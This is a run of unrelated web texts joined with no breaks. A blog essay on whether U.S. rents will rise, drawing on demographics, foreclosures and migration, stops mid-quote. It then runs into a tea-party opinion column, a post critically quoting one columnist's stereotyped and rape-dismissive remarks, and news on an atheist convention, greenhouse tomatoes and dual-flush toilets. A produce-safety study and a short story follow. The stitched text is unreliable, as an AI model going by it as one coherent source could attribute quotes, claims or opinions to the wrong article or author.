Moreover , within the older segment of the population , because of longer life expectancy and additional persons reaching older ages , there will be age shifts resulting in the 85 and older population more than doubling in size from 4.3 million persons to approximately 8.9 million persons .
An aging U.S. population means less productive workers , less big - spending consumers , and more dependent elders …
Brazil has a much younger age demographic .
And India ’s is even younger than Brazil ’s .
The following chart shows that Japan has the worst demographics of all , with a staggering percentage of elderly who need to be taken care of by the young : Chart 2 : Old Age Dependency Ratios for Selected Countries Source : http://data.un.org/
The chief economist for Standard and Poor ’s is now confirming the importance of national demographics :
But I do n’t think [ a lost decade in the U.S. is ] as likely over here .
For one thing , one of the problems in Japan was the demographics .
And we do n’t have the problem of a declining population to deal with , although the labor force is going to slow down considerably as soon as the baby boomers retire .
In other words , America ’s age demographics are n’t as bad as Japan ’s , but they are n’t helping , either .
Seniors have less income from wages , but have had longer to save money and invest .
However , a report by the Center for Economic and Policy Research shows that most baby boomers have accumulated little to no wealth .
No wonder :
David Rosenberg from Gluskins Sheff expects
Americans to retrench ferociously as 78 m baby boomers face the looming threat of penury in old age .
In addition , pensions are getting killed , and because the states are already experiencing massive budget deficits that cannot cover education and other expenses , something has to give .
I am not convinced that pensioners are going to get paid 100 % of what they were promised .
Same with social security benefits .
Does that mean people will receive drastically reduced benefits compared to what they were promised , that taxes will skyrocket , or both ?
Any way you look at it , the American population is quickly greying , and a high percentage of seniors wo n’t have much to spend on housing .
As the above - quoted Forbes article states :
Pittsburgh has the country ’s cheapest metropolitan area rental units .
Lessees there pay a median monthly rent of $ 608 , less than half of San Jose’s .
This is partly because Pittsburgh has struggled to rebuild its economic base after the loss of its steel industry , and residents are aging or leaving the city .
“ The bottom line is that Pittsburgh is undergoing a sea shift in its economic base , ” says Susan Wachter , a real estate professor at the University of Pennsylvania ’s Wharton School .
“ Rents are relatively low because it ’s in a state which is losing population , and it is simply not doing well . ”
One final factor : long - term care facilities for seniors are growing like gangbusters :
Assisted living facilities are a relatively new housing phenomenon .
Although they were extremely rare even ten or fifteen years ago , they ’ve become the fastest - growing and most popular elderly residential product type .
Although actual numbers are sketchy , an estimated one million seniors currently reside in approximately 40,000 assisted living facilities , as compared with only 600,000 who did so only ten years ago , when there were about one - quarter of these projects nationwide .
And looking ahead , experts estimate that by the year 2020 , 14 million of us will require this kind of housing , double the number who do so today .
Such facilities will soak up some of the housing demand for the elderly , which also argues for lower rental prices .
Housing Troubles
Falling home prices are generally correlated with rising rental prices .
As Forbes noted in 2008 :
Sinking house prices often send rents soaring …
Moreover , when there are a lot of foreclosures in a given area , a lot of people are evicted from their homes , and must scramble to find rentals .
This usually leads to higher rental prices , as surging demand chases a fixed supply .
As the above - quoted USA Today pointed out :
The most brutal real estate slump in decades is reverberating through the rental market .
Renters in properties that are being foreclosed on are being evicted .
Homeowners forced into foreclosure are becoming tenants again and driving up rents .
And renters not yet ready to buy a home — shut out by stricter lending rules or hoping to buy after prices fall still further — are creating a dynamic shift :
Even as real estate is sputtering , the rental market is surging .
On the other hand , as CNN noted in 2008 that foreclosures may make more rental properties available , thus tending to reduce rental prices :
“ The major factors having an impact on housing prices are foreclosures , which make more rental property available , ” said Owen Johnson , president of Investment Instruments , “ and also foreclosures that are not happening . ”
In the latter case , according to Johnson , many speculators bought properties to “ flip , ” selling them quickly in a rapidly appreciating market .
In some Sun-Belt areas , investors bought condos and other properties while they were still in development , to sell when a project finished .
Other investors bought existing single - family homes or other properties , intending to do cosmetic improvements and then sell them at a profit .
But before they could do that , the slump hit , and home values dropped .
Instead of selling at a loss , investors of all stripes are now renting them out .
So how is housing going to do ?
Well , as the Washington Post noted last week , things are n’t all rosy :
The [ Case - Shiller ] report is “ mixed , ” David M. Blitzer , chairman of the index committee at Standard & Poor ’s , said in a statement .
The “ rebound in housing prices seen last fall is fading . ”
And given the data , he said , “ we ca n’t say we ’re out of the woods yet . ”
Housing analysts are worried that an expected increase in foreclosures hitting the market could put pressure on prices this year .
Also , a Federal Reserve program that has kept interest rates low ends Wednesday .
If mortgage rates rise later this year as expected , some potential buyers might stay on the sidelines .
Home sales have been weak since a tax credit for first - time home buyers was initially scheduled to expire in November .
Existing - home sales have fallen 23 percent since then , for example .
Congress extended the tax credit , giving buyers until April 30 to sign a contract for a home , and expanded it to more buyers .
But “ the second credit , up to now , is having minimal effects , ” said Patrick Newport , an economist with IHS Global Insight .
Many buyers at the tipping point of making a home purchase probably took advantage of the tax credit the first time , Dye said .
“ That group now has been used up .
I would expect to see a smaller marginal effect from the tax credit going forward , ” he said .
Even if home prices rise during the spring buying season , they are likely to fall again during the second half of the year , analysts said .
IHS Global Insight is expecting prices to fall another 5 percent this year .
“ There is some turbulence out there that I am concerned about , ” Dye said .
Indeed , the S&P Case Shiller Futures Index forecasts that housing wo n’t bottom until May 2011 :
Specifically , the Case Shiller Futures Index assumes that housing prices will remain strong for the first half of the year – while various Fed programs are still in effect – and then fall sharply until they hit bottom in spring 2011 .
And – contrary to what many assume – the foreclosure crisis is far from over .
As I wrote in September :
The foreclosure problem in American is not just subprime mortgages .
True , banks have been holding on to their foreclosed properties for months , but now they ’re getting ready to release them onto the market , which could depress prices for existing homeowners , further driving them underwater .
But that ’s not what I ’m talking about .
There are huge tidal waves of defaults on option arm , alt - a , and other types of loans coming ( see this and this ) .
But even that is arguably not the main problem .
Perhaps the biggest problem is that the crash in real estate and rising unemployment together form a positive feedback loop .
As McClatchy and the Associated Press note , foreclosures rise as jobs and income drop .
As former chief IMF economist Simon Johnson points out , there is a vicious cycle also exists between unemployment and property foreclosures : Unemployment is always a lagging indicator , and given the record low number of average hours worked , it will turn around especially slowly this time .
Until then , people will continue to lose their jobs and wages will remain flat , and any small rebound in housing prices is unlikely to help more than a few people refinance their way out of unaffordable mortgages .
So unless the other part of the equation – monthly payments – changes , the number of foreclosures should just continue to rise .
Indeed , the Washington Post notes :
The country ’s growing unemployment is overtaking subprime mortgages as the main driver of foreclosures , according to bankers and economists , threatening to send even higher the number of borrowers who will lose their homes and making the foreclosure crisis far more complicated to unwind .
And see this .
Some economists give 5 % as the magic number : when unemployment declines to 5 % , then unemployment will no longer be such a huge contributor to foreclosures .
But Moody ’s forecasts that unemployment will not go back down to 5 % until 2014 .
Similarly , the the chief economist for the U.S. Chamber of Commerce – Martin Regalia – “ thinks that it could be five years before the U.S. economy generates enough jobs to overcome those lost and to employ the new workers entering the labor force ” , according to McClatchy .
Indeed , unemployment could be a problem for many years to come .
And see this article from Time , this chart from Credit Suisse :
And this chart from Agora Financial ’s Daily Reckoning :
Indeed , as David Rosenberg writes :
There were over 158,000 bankruptcy filings in the personal sector in the U.S. [ in March ] ( that ’s 6,900 per day ! ) which was a 35 % surge over February ’s result and up 19 % from last year ’s elevated levels .
This also shows the extent to which fewer people are attempting to save their homes .
They realized that their mortgage payments are not affordable and their attitudes towards residential real estate as a viable retirement asset have been altered permanently as many now see their house as nothing more than a debt - laden ball and chain .
( Rosenberg also points out that while skyrocketing unemployment might be slowing , wage deflation is just beginning ) .
Finally , Calculated Risk writes today :
From Diana Olick at CNBC : Let the Short Sales Begin I ’m … starting to hear rumblings among the number crunchers that the wave of foreclosures we keep hearing about is about to hit with a thunderous roar .
Servicers are ramping up the mod process and pushing those who do n’t qualify out the door more quickly than ever .
I do n’t know about a “ thunderous roar ” , but I do think we will see more distressed sales soon .
Most trustee sales seem to be “ postponed ” each month , and perhaps the lenders were just waiting for the HAFA short sales program to begin .
That program started today …
On The Other Hand …
In really bad times , people who are evicted from their houses will not rent .
Instead , they will move in with friends or family for some time .
As the Wall Street Journal explained last October :
Driving the change [ i.e. large numbers of rental vacancies and lower rents ] is the troubled employment market , which is closely tied to rentals .
With unemployment at 9.8 % — a 26 - year high — more would - be renters are doubling up or moving in with family and friends during periods of job loss .
Landlords have been particularly battered because unemployment has been higher among workers under 35 years old , who are more likely to rent .
Nationally , effective rents have fallen by 2.7 % over the past year , to around $ 972 .
As Zack ’s Investment Research writes :
A smaller percentage of Americans owned their own homes in the 4th quarter of 2009 than at any time since 2000 .
In the 4th quarter 67.2 % of Americans owned their own home , down from 67.6 % in the third quarter and two full percentage points below the peak set in the fourth quarter of 2004 .
As the first graph below shows ( from Calculated Risk ) …:
So where have all these people gone who are no longer homeowners ?
It does not appear that they are moving into apartments or rental housing .
As the second graph shows ( also from Calculated Risk ) , the rental vacancy rate is now at 10.7 % .
While that is down from the record level of 11.1 % in the third quarter , it is up from 10.1 % a year ago , and the 7 - 8 % range that was normal for most of the 1990s …
***
It thus appears that many of the people who used to own their homes , and no longer do , are doubling up with friends and family .
This is probably not their first choice of living arrangements , but they are doing so because they have no other choice economically .
In other words , the correlation between falling home prices and rising defaults , on the one hand , with increasing rental demand and higher rental prices , on the other hand , does n’t hold in a really tough economy .
American Population Growth is Slowing
The U.S. Census Bureau notes :
The U.S. population growth rate is slowing .
Despite these large increases in the number of persons in the population , the rate of population growth , referred to as the average annual percent change , 1 is projected to decrease during the next six decades by about 50 percent , from 1.10 between 1990 and 1995 to 0.54 between 2040 and 2050 .
The decrease in the rate of growth is predominantly due to the aging of the population and , consequently , a dramatic increase in the number of deaths .
From 2030 to 2050 , the United States would grow more slowly than ever before in its history .
A lower population growth rate would tend to argue for lower rental prices , since it means less new residents looking for housing .
Indeed there is somewhat of a “ reverse migration ” occurring .
For example , last year there were many stories of immigrants returning to their native countries .
Of course , if the American economy substantially strengthens , this trend will stop .
“ Dust Bowl in Reverse ”
A “ dust bowl in reverse ” has also occurred , where people are moving out of the West and back to the mid-West .
As California state senator George Runner pointed out last year :
A recent Sacramento
Bee article cites a reverse migration to the Mid-west .
This marks a stunning reversal of the historical trend of migration into California – especially during the Dust Bowl that sent hundreds of thousands of Midwesterners west toward the Golden State .
During the Dust Bowl , people left states like Texas , Arkansas , and Oklahoma because a drought left the once fertile soil barren and bone - dry .
The livelihoods of the farmers shriveled with the crops , and families found themselves in destitution .
They sought the greener pastures of California .
But where the Dust Bowl of the Great Depression sent a massive migration of Midwesterners to California , the current economic hardship is now driving residents back to the Midwest .
In fact , between 2004 and 2007 , California lost 275,000 residents to the former Dust Bowl states that were once responsible for the state ’s huge population growth .
While California was once seen as the place of hope for a better life , Californians are now looking elsewhere for opportunity …
Indeed , a lot of people are moving to places like Oklahoma .
As Michael Roston writes :
The Tulsa World noted in December :
The state added 43,025 residents from July 2008 to July 2009 , the largest annual increase this decade .
The annual increase also reverses the one - year dip when the population failed to increase more than it did the previous year .
Overall , the Census Bureau estimates the Oklahoma population was 3,687,050 in July 2009 compared to 3,644,025 in July 2008 .
The annual population increase was 39,780 in 2007 and 34,238 in 2008 .
Most of the overall population increase was fueled by persons moving to Oklahoma from other states , defined as domestic migration .
Domestic migration accounted for 18,345 new residents to the state with international migrants accounting for 5,340 additional people .
It ’s not quite gangbusters , but it shows that the state known more for the Dust Bowl than for economic opportunity has turned itself around in a lot of ways .
The Oklahoman ’s crack Database Editor Paul Monies put together some visualizations of the differences in population between the Oklahoma of the Great Depression and the the Oklahoma of the Great Recession .
His newspaper went on some months later to reflect triumphantly in an editorial : Time was when Oklahomans fled to California in great numbers , so much so that the Golden State tried to put a stop to it .
Now Californians are moving east ; some of them are landing in Oklahoma .
Cox says that in every year during the 2000s , Oklahoma gained net domestic migrants from California .
The South has also been hit hard .
As the Wall Street Journal noted last month :
The recession has halted the dominant migration trend of recent decades , turning once - hot destinations such as Las Vegas and Orlando , Fla. , into some of the country ’s losers .
***
The reversal of migration in former housing - boom cities could aggravate their real - estate downturns .
A separate report released by the National Association of Realtors on Tuesday showed that February real - estate sales and prices were hit harder in the West and South — areas that have seen big reductions in migration .
The shifts represent a radical departure from the migration patterns that had made cities such as Las Vegas and Orlando some of the country ’s fastest - growing .
For decades , people have been leaving colder Northeastern and Midwestern states , either to retire or to chase better weather and jobs in the South and West .
“ It ’s unprecedented to see areas like Las Vegas and Orlando , just blue - chip destinations for anybody who wanted to move , to stop and stay stopped over a couple of years , ” said William Frey , a demographer with the Brookings Institution , a Washington think tank .
On the other hand , the Journal notes :
In many cases , cities in the Midwest and Northeast are gaining because residents are locked in place .
With depressed home prices and a dearth of out - of - state job offers preventing departures , even a modest number of people moving in can drive gains .
The Boston area , for example , swung to an inflow of about 6,800 in 2008 - 2009 from an outflow of about 46,000 in 2004 - 2005 .
The Chicago area ’s outflow narrowed to about 40,400 from about 77,400 .
The most - recent official U.S. Census Bureau population growth rates for different states – between July 1 , 2008 to July 1 , 2009 , and for earlier periods – are available here , and here is a summary .
This factor weighs in favor of higher rental prices in the Midwest and Northeast , and lower rental prices in the West and South .
Back to the Country ?
For hundreds of years , people have migrated from rural areas to the cities in search of better employment .
Will this change ?
Sean Riskowitz argues that it already has :
Data released by the U.S. Census Bureau reveals a reverse urban migration trend in the country .
This interactive graph paints the picture .
The recession has played a big role in determining migration trends in the U.S. , with most people either staying where they are or returning to where they came from , particularly in big cities .
The New York area lost a net 100,000 people in 2009 , ( down from 220,000 in 2007 ) while Los Angeles lost a net 80,000 ( down from a massive 222,000 in 2007 ) .
Chicago lost a net 40,000 residents which is in line with the 52,000 the recession sent packing in 2007 .
This runs contrary to historical data which shows a net migration of people to big cities , rather than away from them .
Reverse urban migration will decrease the supply of labor and consumers in the cities which could result in lower prices in terms of real estate and consumer goods , not to mention services such as restaurants .
Again , even if Riskowitz ’s interpretation of the data is correct , such a trend might be reversed if the economy strengthens .
But there may also be longer - term trends arguing for counter - urbanization .
Oxford University ’s Geography Dictionary defines counter - urbanization , and gives some good arguments for it :
The movement of population and economic activity away from urban areas .
The push factors include : high land values , restricted sites for all types of development , high local taxes , congestion , and pollution .
The pull factors offered by small towns are just the reverse : cheap , available land , clean , quiet surroundings , and high amenity .
Improvements in transport and communications have also lessened the attractiveness of urban centres , and commuters are often willing to trade off increased travel times for improved amenity .
Furthermore , with the ageing of populations in the West , many no longer need to travel to work .
In advanced economies , there have been swings in the directions of net migration between metropolitan and non-metropolitan areas , although the timing of these shifts varies spatially .
The USA , for example , saw counter - urbanization the 1970s , and concentration in the 1980s , followed by further deconcentration in the 1990s ( Lewis , Geography 85 ) .
The migration balance will also be affected by government policy which suggests that 60 % of new housing should be on brownfield sites , and 40 % on greenfield ( Department of the Environment 1996 Household Growth ) .
Some argue that technology will encourage counter - urbanization .
However , Bill Gates has famously said :
I thought digital technology would eventually reverse urbanization , and so far that has n’t happened .
But people always overestimate how much will change in the next three years , and they underestimate how much will change over the next 10 years .
If the U.S. economy really tanks to the point that distribution systems are disrupted , then people may either move out in the country ( to grow their own food and locate their own water ) or into the middle of the big cities ( where they can get by without gas , and pool resources with others ) .
Obviously , if it occurs , counter - urbanization would lead to a decrease in demand for urban rentals .
But it is too early to know how these trends will play out .
Wealth Distribution
The polarization of America ’s wealth distribution is more extreme than it is has been for many decades .
In other words , not only have the rich gotten richer and the poor gotten poorer , but much of the middle class has disappeared .
So most people have less to spend on housing .
The wealthy are likely going to buy , not rent , so they should n’t play a part in the analysis .
That may argue for low - income and modest rentals doing well as most people become more frugal .
Other Factors
Obviously , many other factors influence how desirable a given locale is .
Silicon valley rental prices boomed during the dot com era .
Washington D.C. is currently booming , due to the increased government involvement in the economy .
As the Wall Street Journal writes :
Some cities accustomed to losing people are showing net gains .
The government ’s growing role in the economy has benefited the Washington , D.C. , area , which drew 18,200 residents from other states , its first net gain since 2002 .
If the “ next big thing ” is centralized in one or a few areas , then rental prices could skyrocket in those areas .
Forbes points out that areas with a high number of apartment - to - condo conversions have higher rental prices :
Signing a lease is also costly in some Florida areas .
Miami and Orlando fetched monthly rents of $ 1,031 and $ 981 respectively .
The race to build condos is partly to blame , says Sean Snaith , director of the Institute for Economic Competitiveness at the University of Central Florida .
“ Miami and Orlando were two pretty hot areas when the housing market was raging for conversion of apartment stock into condominiums , ” he says of the mid-decade housing boom .
“ So that reduced supply . ”
And factors such as the amount of crime , how good the schools are and percentage of public housing will always affect rental prices .
Where To From Here ?
The Wall Street Journal writes :
Apartment rents rose during the first quarter , ending five straight quarters of declines and signaling the worst may be over for the hard - hit sector .
Nationally , the apartment vacancy rate stayed flat at 8 % , the highest level since Reis Inc. , a New York research firm , began its tally in 1980 .
Reis tracks vacancies and rents in the top 79 U.S. markets , and rents rose in 60 of them , led by Miami , Seattle and New York — all cities that have notched big rental declines in the past year .
Rents increased 1.6 % in the first quarter in Miami and 0.9 % in New York .
The gains came during what is usually a seasonally weak period for apartments and suggested that landlords may have some momentum heading into the peak spring and summer leasing season .
“ Deterioration seems not to have just been arrested but reversed , ” said Victor Calanog , director of research for Reis .
“ Several markets have bottomed and may be on track to recovery , ” he said .
Nationally , effective rents , which include concessions such as one month of free rent , rose 0.3 % during the quarter compared with a 0.7 % decline in the fourth quarter of last year and a 1.1 % drop in the first quarter of 2009 .
Vacancies are tied to unemployment , because many would - be renters move in with family members or double up during a downturn .
“ We clearly hit an inflection point in all of our markets in January and February , ” said Jeffrey Friedman , chief executive of Associated Estates Realty Corp. , which owns and operates 12,000 units in the eastern U.S. Renters are also staying put longer : the average renter now stays for 19 months , up from an average of 14 months , said Mr. Friedman , and despite low mortgage rates and greater home affordability , fewer renters are leaving to buy homes .
“ This is the first time in many , many years that it feels like even people who could afford to buy are making the investment decision not to , ” Mr. Friedman said .
Difficulty in obtaining financing for new apartment construction , meanwhile , has limited the supply of new units that will be added in the coming years .
Those fundamentals have landlords and investors excited about the potential for rents to pop once the economy gathers steam .
Still , Mr. Calanog said that a “ slow recovery ” was likely and that landlords should n’t expect “ galloping rental growth ” until the job market firms up , particularly because younger workers that are more likely to rent have borne the brunt of job losses .
Others warned that gains were fragile and that landlords could continue to offer concessions to fill units .
“ Rent reductions are not over yet , ” said Hessam Nadji , managing director at real - estate firm Marcus & Millichap .
He said he did n’t expect to see sustained rental growth until the second half of the year .
Barely half of the 22,000 units in buildings that opened their doors last quarter were filled , and landlords may cut deals because they face deadlines to pay back construction loans .
“ That ’s where renters are going to find deals , ” Mr. Calanog said .
Calculated Risk comments on the Wall Street Journal story , noting :
The Reis numbers are for cities .
The overall vacancy rate from the Census Bureau was at a near record 10.7 % in Q4 2009 .
Rents plunged in 2009 by the most in the 30 years Reis has been tracking rents – and with vacancies at record levels , the slight increase in Q1 2010 rents does n’t mean the rent declines are over .
But why were there so many vacancies in the first place ?
As discussed above , unemployment is causing people to double - up with others .
And as the Wall Street Journal explained last October , there was overbuilding in some of the prime markets :
By E.J. Dionne - April 19 , 2010
The tea parties are nothing new .
They represent a relatively small minority of Americans on the right end of politics , and will not determine the outcome of the 2010 elections .
In fact , both major parties stand to lose if they accept the laughable notion that this media - created protest movement is the voice of true populism .
Democrats will spend their time chasing votes they will never win .
Republicans will turn their party into an angry and narrow redoubt with no hope of building a durable majority .
The news media 's incessant focus on the tea parties is creating a badly distorted picture of what most Americans think and is warping our policy debates .
The New York Times and CBS News thus performed a public service last week with a careful study of just who is in the tea party movement .
Their findings suggest that the Tea Party is essentially the reappearance of an old anti-government far right that has always been with us and accounts for about one - fifth of the country .
The Times reported that tea party supporters " tend to be Republican , white , male , married and older than 45 . "
They are also more affluent and better educated than Americans as a whole .
This is the populism of the privileged .
And the poll suggested something that white Americans are reluctant to discuss :
Part of the anger at President Obama among tea partiers does appear to be driven by racial concerns .
Saying this invites immediate denunciations from defenders of those who bring guns to rallies , threaten violence to " take our country back , " and mouth old slogans about states ' rights and the Confederacy .
So let 's be clear : Opposition to the president is driven by many factors that have nothing to do with race .
But race is definitely part of what 's going on .
The poll asked : " In recent years , do you think too much has been made of the problems facing black people , too little has been made , or is it about right ? "
Twenty - eight percent of all Americans -- and just 19 percent of those who are not tea partiers -- answered " too much . "
But among tea party supporters , the figure is 52 percent , almost three times the proportion of the rest of the country .
A quarter of tea partiers say that the Obama administration 's policies favor blacks over whites , compared with only 11 percent in the country as a whole .
So race is part of this picture , as is a tendency of tea party enthusiasts to side with the better - off against the poor .
This puts them at odds with most Americans .
The poll found that while only 38 percent of all Americans said that " providing government benefits to poor people encourages them to remain poor , " 73 percent of tea partiers believed this .
Among all Americans , 50 percent agreed that " the federal government should spend money to create jobs , even if it means increasing the budget deficit . "
Only 17 percent of tea party supporters took this view .
Asked about raising taxes on households making more than $ 250,000 a year to provide health care for the uninsured , 54 percent of Americans favored doing so vs. only 17 percent of tea partiers .
This must be the first " populist " movement driven by a television network :
Sixty - three percent of the tea party folks say they most watch Fox News " for information about politics and current events , " compared with 23 percent of the country as a whole .
The right - wing fifth of America deserves news coverage like everyone else , and Fox is perfectly free to pander to its viewers .
What makes no sense is allowing a sliver of opinion to dominate the media and distort our political discourse .
Democrats face problems not from right - wingers who have never voted for them but from a lack of energy among their own supporters and from dispirited independents and moderates who look to government to solve problems but have little confidence in its ability to deliver .
A Pew Research Center study released Sunday is thus a better guide than the tea parties ' rants to the real nature of this nation 's discontent .
It found that only 22 percent of Americans say they can trust the government almost always or most of the time , " among the lowest measures in more than half a century . "
This mistrust extends beyond government to banks , financial institutions and large corporations .
So , yes , there is authentic populist anger out there .
But you wo n't find much of it at the tea parties .
Alex Knepper 's claim that " date rape is an incoherent concept " continues to make waves , this time with an interview in which he says people of color are anti-gay , but at least smart enough not to get raped .
Advertisement
In an interview with Andrew F. of The New Gay , Knepper says the angry response to his column has " knocked some of the elitism out of me . "
He elaborates :
Almost unanimously from racial minorities I 've received support .
Racial minorities are used to living in a world with risks .
They 're more used to reading signals when partaking in risky behaviors .
These wealthy , upper - class white suburbanites have never had any problems in their lives and have never bothered to read any philosophy , literature , history , or psychology , and so they do n't even have the intellectual background to understand it .
Advertisement
He 's laying on the stereotypes pretty thick here , perhaps intentionally — people of color lead lives of danger , white people have no problems — but what 's really interesting is when his generalizations nearly cancel each other out .
He says the Democratic Party is often anti-gay , and explains :
Honestly , it 's because they 're beholden to the cultural interests of racial minorities which are overwhelmingly anti-gay .
That 's the elephant in the room that nobody wants to talk about .
Black people voted against proposition eight 85 to 15 .
No one wants to talk about this .
The Democrats can't make a move on this because they 're going to piss off a third of their constituency .
It 's terrible , the Democrats really can't make moves on anything because they have such heterogeneous constituencies , all with clashing interests and linked together only by their sense of victimhood .
If they lose that connection , they lose the entire coalition .
And that 's why nothing ever gets done , not only for blacks or Hispanics but for gays .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Knepper is n't the first to make this point about Prop. 8 , but he may be the first to praise minorities for their attitudes on date rape while lambasting them for their homophobia .
I guess what Knepper is saying here is that minority readers have been supportive of his column but that minorities in general are n't supportive of his lifestyle , but the stereotypes he has to invoke to make both points ( cf. " sense of victimhood " ) are pretty staggering .
I could go on and on about the nonsense straw feminists Knepper sets up , about his racial assumptions , and about his continued claims that he and only he knows what is hot in sex .
Instead , I 'd rather move the conversation forward by quoting from Men Can Stop Rape 's press release on Knepper 's original column .
After noting that " Rape is not an ' incoherent concept ' for the estimated one in four college women who will be raped by classmates , boyfriends , friends , or dorm - mates during their college career , " the organization lists " five things men can do to prevent date rape .
Note that none have anything to do with girls drinking less or wearing modest clothing :
1 . Does kissing mean that a person wants to have sex ?
How do you know ?
When a situation is unclear , asking before you act will ensure safe and healthy sex for everyone .
2. Accept when consent is withdrawn .
Even after a person has given their consent , that person can withdraw it at any time .
We all deserve the right to change our minds .
3 . If a person is drunk or high and can't give consent , back off and wait until you both are sober .
4 . You 've heard of designated drivers .
Now use the same principle to prevent rape .
At a party , designate someone among your group of friends to keep an eye on a guy that might be behaving in ways that could lead to sexual violence .
5 . You probably will never see a rape in progress , but you will hear attitudes and see behaviors that degrade women and promote a culture of violence .
When your friend tells a rape joke , let him know it 's not funny .
Advertisement
I 'd like to add : if your friend , like Knepper , claims that women who go to parties are to blame for their own rape , explain why he ( or she ) is wrong .
Image via CBS .
The Lives of Otters : A Conversation With Alex Knepper [ The New Gay ]
Press Release : Date Rape
Is A Crime , Not An " Incoherent Concept " [ Men Can Stop Rape ]
Rape Article Meant To Foster Dialogue [ CBS ]
Advertisement
Earlier : " ' Date Rape ' Is An Incoherent Concept " : Blaming The Victim , American U. Edition
" The Rules Of Anonymous Sex : " American U. Columnist Responds To Rape Apology Charges
Melbourne attracted more believers to a convention last year
More than 2,000 atheists from around the world are gathering in Melbourne , Australia , to celebrate their lack of religious belief .
It is thought to be the world 's largest gathering of atheist thinkers .
They plan to issue a statement on what they say are the negative effects of religion on society .
All 2,500 tickets were sold out earlier this year , but a religious gathering at the same venue in December attracted three times as many delegates .
The Global Atheist Convention is bringing together scientists , philosophers , writers and comedians , says the BBC 's religious affairs correspondent Christopher Landau .
They will be joined by bestselling author Richard Dawkins and discuss Islam and terrorism in a session titled The Cost of Delusion .
They will also hear a film proposal , exposing the amount taxpayers spend subsidising religion .
There is a determination to avoid what one session calls Atheistic Fundamentalism , says our correspondent .
Participants will be urged to avoid " missionary zeal " in their determination to promote their non-religious message to the world .
Backed by consumer demand for fresh tomatoes year round , the indoor acreage devoted to growing tomatoes has become nearly six times as large since the early 1990s , said Roberta Cook , a marketing economist who helped write what many in the industry consider to be the definitive report on greenhouse tomatoes in 2005 .
Those tough pink ones are still good and cheap enough for most fast food restaurants and the food service industry , which buy about half the fresh tomatoes sold in the United States .
But with shoppers willing to pay a premium  even $ 4 to $ 5 a pound  for red vine - ripened ones with more flavor , greenhouse tomatoes now represent more than half of every dollar spent on fresh tomatoes in American supermarkets , according to figures from the Perishables Group , a market research firm in Chicago .
“ In the U.S. , it ’s hard to be competitive without a 20 - acre minimum block , ” Ms. Cook said .
The plants here at Backyard Farms number about 550,000 .
Each consists of two plants  the vines of new varieties , constantly tweaked for flavor , color , freshness and myriad other traits ; and the roots of another , grafted together at a thickly scarred “ V ” near the base .
One half grows down into a sterile dirt - substitute made from fibers spun out of volcanic basalt , absorbing a custom hydroponic cocktail mixed by Mr. de Kok .
The other half stretches toward the glass ceiling , growing a foot every week along a nine - foot length of twine .
When the plants reach the top , workers reel more twine from the spool , shift the entire row horizontally and band each vine to its neighbor so that by the end of a plant ’s life it might grow parallel to the concrete floor for as many as 20 or 30 feet , a dozen vines tangled together like garden hoses , before each makes its own graceful turn upward .
“ It ’s like a bonsai tree  you have to treat every plant exactly the same , ” Mr. de Kok said .
“ As soon as it gets uneven , that ’s when it starts to get away from you . ”
Dual flush toilets , despite the amount of water they save , used to be quite costly to obtain ( around three hundred dollars ) .
Nowadays , though , you can convert the toilet you already have for about thirty dollars and a half hour of work .
Advertisement
Photo by Tom Arthur .
You may or may not be familiar with dual flush toilets — they tend to be used in more water - scarce areas , using two different methods of flushing ( one for liquid waste , which requires less water to flush , and one for solid ) .
With the release of dual flush retrofit kits , saving this much water is an easy task for anyone with a little DIY knowledge ( and a standard 1.6 gallon toilet ) .
Advertisement
You 'll have to remove the bolts that hold the water tank to the toilet bowl and disconnect the water line to remove the tank , but that 's probably the most difficult part — replacing the actual hardware inside the tank is n't quite as daunting .
It 's quite worth it , too — you can probably save sixteen gallons a day for a family of five , which even if you 're not too concerned about being green , is quite a money saver .
Hit the link for more details , as well as some recommendations for kits .
How To Install a Dual Flush Conversion Retrofit Kit [ HubPages ]
[ social_buttons ]
Not only do low - income neighborhoods have less access to fresh produce , but the rare fruit or veggie found in these areas is also more likely to be tainted .
A new study in the American Journal of Preventive Medicine suggests that the levels of bacteria , yeast , and mold found on fresh produce vary according to the income level of the neighborhood in which the produce is sold .
Researchers compared levels of microorganisms on identical products sold in six Philadelphia - area neighborhoods .
The poorer the neighborhood , the higher the number of bacteria , yeast , and mold on ready - to - eat salads and strawberries .
Similarly , cucumbers sold in poor neighborhoods had higher yeast and mold counts while watermelon contained more bacteria .
The researchers suggested that the smaller size of grocery stores in low - income neighborhoods might make stores less equipped to handle produce safely .
Their results highlight some of the challenges associated with increasing fresh produce availability in small retail stores that service poorer neighborhoods .
For more information , visit :
Related posts :
Image courtesy misterbisson of via a Creative Commons license .
by William Cryer
I n the deep predawn I wake to the groan of wind and the sound of Crepe Myrtle clawing at my window pane .
I lie beneath a mound of cool linen and wait for my mind to piece itself together again , for memories to coalesce , but all I see is a whorl of capering silhouettes .
Rising , I grope for the light switch .
In the bathroom I 'm still half - asleep , and the white ceramic curve of the toilet is a giant deviled egg without the devil .
Have some yoke , I offer in slurred dream speech and drizzle , yellow and frothy .
From the other end of the house I hear my mother stirring , beginning her daily ministrations in the kitchen .
Prepare coffee , feed the dog , feed the cats , take out the trash .
Neither of us drinks coffee and the cats have all disappeared , but she clings to her routine , like a sprinkler system that continues its diurnal chug long after its owners have fled their home , long after the home has begun to crumble and blow away upon an ancient and dying planet , which in turn persists its weary revolution around a black and shrunken sun .
Back in my bed the ceiling fan is a pin-wheel and I blow and blow , but can never send the blades spinning .
* * *
She moves silently through each room , sliding her hand over armoire and curtain , feeling for the past .
But the house refuses to yield up its stores , so she retreats into the carport .
There she is met with the dank smells of creosote and leafmold .
Rusty pegs dot the far wall where assorted tools hang , collecting cobwebs and dust .
Empty beer bottles remain undisturbed in a corner .
She hesitates a moment , memories insinuating themselves , unbidden .
She surveys the room once more — the tools , the beer bottles , the oily clutter–and the dismay on her face voices a sudden moment of clarity : that his entire existence was paraphrased in this one place .
Finding no purchase in the carport , she steps out onto the broad front lawn .
A soft breeze thrums the trees , carrying the faint laughter of a little boy .
The sound floods her mind , sending her reeling into time .
He appears on the wooden swing , like a diaphanous afterthought .
The child is beautiful , like a fallen seraph , with eyes of ponderous sapphire .
He looks at her with a numinous smile that pierces her heart .
She sits down beside the apparition and places her hand in the empty space .
Later she kneels next to an oak tree , turning up soil in the flowerbed .
The dog trots over and drops something at her feet .
It is the fetid skull of a calf , exhumed from some neighboring field .
She picks it up , gingerly holding it before her .
For a long time she gazes at the bone .
And by the flower bed under the oak tree her quiet sobs take form and mingle with the soft drone of cicadas .
* * *
Dusk spills over the firmament like entrails from a stomach .
